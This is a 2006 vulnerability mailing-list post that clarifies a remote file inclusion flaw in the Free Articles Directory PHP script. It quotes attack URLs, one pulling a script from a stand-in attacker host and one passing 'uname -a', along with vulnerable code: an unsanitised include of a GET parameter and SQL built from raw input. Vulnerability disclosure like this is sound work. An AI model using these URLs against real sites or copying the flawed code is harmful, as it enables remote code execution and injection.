[VIM] Free Articles Directory - file inclusion, code execution?

Josh Zlatin jzlatin at ramat.cc
Wed Mar 22 07:46:38 EST 2006


On Wed, 22 Mar 2006, security curmudgeon wrote:

>
> http://archives.neohapsis.com/archives/bugtraq/2006-03/0396.html
>
> Original disclosure isn't very clear, but the sample looks like it is passing 
> arbitrary commands to be executed:
>
>  http://[target]/index.php?page=evilcode?&cmd=uname -a
>
> http://www.secunia.com/advisories/19320/
>
> Secunia is calling this local/remote file inclusion. Clarification or 
> different issue?

Looks to me like a clarification, meaning:
http://[target]/index.php?page=http://[attacker]/evilscript

opens and runs the php script (note the following code in index.php
though: include($_GET["page"].".php");

I was unable to run uname -a or any other command I tried via the cmd
command, but that is probably because the 'cmd' variable is defined as
the result of the following SQL query:
SELECT * FROM document_master where doc_title='".$_GET["pagedb"].

--
  - Josh


More information about the VIM mailing list